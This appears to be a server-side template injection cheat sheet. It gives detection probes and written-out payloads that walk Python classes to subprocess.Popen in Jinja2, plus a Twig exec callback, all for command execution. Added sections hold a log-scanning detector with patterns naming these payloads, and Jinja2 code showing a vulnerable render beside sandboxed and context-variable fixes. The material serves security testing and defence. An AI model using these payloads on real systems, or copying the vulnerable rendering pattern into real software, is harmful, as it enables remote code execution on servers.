Template engines are widely used by web applications to present dynamic data via web pages and emails. Unsafely embedding user input in templates enables Server-Side Template Injection (SSTI).
#Detecting | Identify reflected user input.
#Break out of the template statement, inject HTML.
personal_greeting=username}}<tag>
http://URL/page1/{7*7}
URL/test{{4-1}}
{{'7'*7}}
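The detection step above has two halves: spot the probes in traffic and tell an evaluated probe (`{{7*7}}` comes back as `49`) apart from one that is merely echoed. The following is an added example, not part of the original cheat sheet; it uses only the Python standard library, the indicator patterns are assumptions drawn from the probes on this page, and the log lines are constructed.

```python
"""Detect SSTI probes in request logs and classify the server's response."""
import re
from urllib.parse import unquote

# Indicator patterns built from the probes on this page (assumed set; tune them
# to the template engines actually deployed).
SSTI_INDICATORS = [
    re.compile(r"\{\{.*?\}\}"),                          # {{ ... }} expression
    re.compile(r"\{%.*?%\}"),                            # {% ... %} statement
    re.compile(r"\{\d+\s*[*+-]\s*\d+\}"),                # {7*7}
    re.compile(r"__class__|__subclasses__|\bmro\(\)"),   # Python object walk
    re.compile(r"_self\.env|registerUndefinedFilterCallback"),  # Twig internals
]


def find_ssti_indicators(request_line: str) -> list:
    """Return every indicator substring found in a request line (URL-decoded first,
    because probes usually arrive percent-encoded)."""
    decoded = unquote(request_line)
    hits = []
    for pattern in SSTI_INDICATORS:
        hits.extend(m.group(0) for m in pattern.finditer(decoded))
    return hits


def classify_probe_response(probe: str, expected: str, response_body: str) -> str:
    """Distinguish evaluation from reflection.
    'evaluated' -> the engine computed the expression (SSTI confirmed)
    'reflected' -> the probe was echoed verbatim (reflection, not SSTI)
    'absent'    -> the input does not appear in the response at all"""
    if expected in response_body and probe not in response_body:
        return "evaluated"
    if probe in response_body:
        return "reflected"
    return "absent"


# Constructed access-log lines (not real traffic); the third carries the
# Python class-walk payload from this page, percent-encoded.
SAMPLE_LOG = [
    "GET /page1/%7B7*7%7D HTTP/1.1",
    "GET /profile?username=alice HTTP/1.1",
    "GET /greet?name=%7B%7B%27%27.__class__.mro%28%29%5B1%5D.__subclasses__%28%29%7D%7D HTTP/1.1",
    "POST /contact HTTP/1.1",
]


def scan_log(lines: list) -> list:
    """Return (line, indicators) pairs for every line carrying an SSTI indicator."""
    flagged = []
    for line in lines:
        hits = find_ssti_indicators(line)
        if hits:
            flagged.append((line, hits))
    return flagged


if __name__ == "__main__":
    for line, hits in scan_log(SAMPLE_LOG):
        print(f"{line}\n    indicators: {hits}")
    print(classify_probe_response("{{7*7}}", "49", "Hello 49"))        # evaluated
    print(classify_probe_response("{{7*7}}", "49", "Hello {{7*7}}"))   # reflected
```

`classify_probe_response` takes the expected value as a parameter so the same check works for `{{'7'*7}}` (expected `7777777`) and for arithmetic probes whose result might coincidentally appear in a page; when in doubt, send two different probes and require both to evaluate before treating the reflection as SSTI.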
#If Python is in use
#Identify Class
{{''.__class__}}
#Iterate [1]
{{''.__class__.mro()[1]}}
#Identify Subclasses. [subprocess.Popen] can be used for code execution.
#Iterate [1]
{{''.__class__.mro()[1].__subclasses__()}}
#Paste the output into vi (:set number) to count the index of the class you need.
{{''.__class__.mro()[1].__subclasses__()[<insert number of class here>]}}
#Get all classes. Iterate over the indices [<integer>] to find interesting functions.
{{''.__class__.mro()[1].__subclasses__()}}
{{ [].__class__.__base__.__subclasses__() }}
{{''.__class__.mro()[1].__subclasses__()}}
{%for c in [1,2,3] %}{{c,c,c}}{% endfor %}
#Find a function that gives code execution. Get access to <class 'subprocess.Popen'>
#X is the integer you need to find.
{{''.__class__.mro()[1].__subclasses__()[X]}}
#Call this method using the following, where:
#X is the index found previously.
#COMMAND is the command you want to run.
{{''.__class__.mro()[1].__subclasses__()[X](COMMAND)}}
#{{''.__class__.mro()[2].__subclasses__()[233]("uname -a",shell=true)}}
#{{''.__class__.mro()[2].__subclasses__()[233]("uname -a",shell=true,stdout=-1).communicate()[0]}}
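Every Python payload above depends on two things: the application compiling user input as template source, and the engine allowing the walk from a string literal through `__class__` to `__subclasses__`. The example below, added here and not part of the original cheat sheet, shows the vulnerable pattern beside the two fixes (pass input as a context variable; use Jinja2's `SandboxedEnvironment` when the template source itself must be user-controlled). It requires the `jinja2` package; the function names and the constructed inputs are assumptions of this example.

```python
"""Vulnerable vs. hardened Jinja2 usage for the SSTI payloads above."""
from jinja2 import Environment
from jinja2.sandbox import SandboxedEnvironment, SecurityError

# Constructed inputs: the arithmetic probe and the class walk from this page.
PROBE = "{{7*7}}"
CLASS_WALK = "{{ ''.__class__.mro()[1].__subclasses__() }}"


def render_vulnerable(user_input: str) -> str:
    """Anti-pattern: user input is concatenated INTO the template source, so any
    template syntax it contains is compiled and evaluated by the engine."""
    return Environment().from_string("Hello " + user_input).render()


def render_safe(user_input: str) -> str:
    """Fix 1: the template is a fixed string and user input is passed as a context
    variable, so the engine treats it as data and never parses it."""
    return Environment().from_string("Hello {{ name }}").render(name=user_input)


def render_sandboxed(template_source: str) -> str:
    """Fix 2 (defence in depth) for cases where the template source must come from
    the user, e.g. customisable notification templates: the sandbox refuses access
    to underscore-prefixed attributes such as __class__ and __subclasses__, which
    every Python payload on this page relies on.  Returns the rendered text, or the
    string 'SecurityError' when the sandbox blocks the template."""
    try:
        return SandboxedEnvironment().from_string(template_source).render()
    except SecurityError:
        return "SecurityError"


if __name__ == "__main__":
    print(render_vulnerable(PROBE))       # Hello 49       -> probe evaluated (vulnerable)
    print(render_safe(PROBE))             # Hello {{7*7}}  -> echoed as plain data
    print(render_sandboxed(CLASS_WALK))   # SecurityError  -> class walk blocked
    print(render_sandboxed("{{ 7*7 }}"))  # 49             -> harmless expressions still work
```

The sandbox is not a substitute for keeping template source out of user hands: it stops attribute-based escapes like the ones above but still evaluates arbitrary expressions, so the first fix (input as a variable, never as source) is the one to apply by default.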
Twig
#Check for Twig-related errors
{{_self}}
#Check access to twig environment
{{_self.env}}
#Alias to the call-user function. This should not reveal any errors.
{{_self.env.registerUndefinedFilterCallback('exec')}}
#Get code execution
{{_self.env.registerUndefinedFilterCallback('exec')}}{{_self.env.getFilter('uname')}}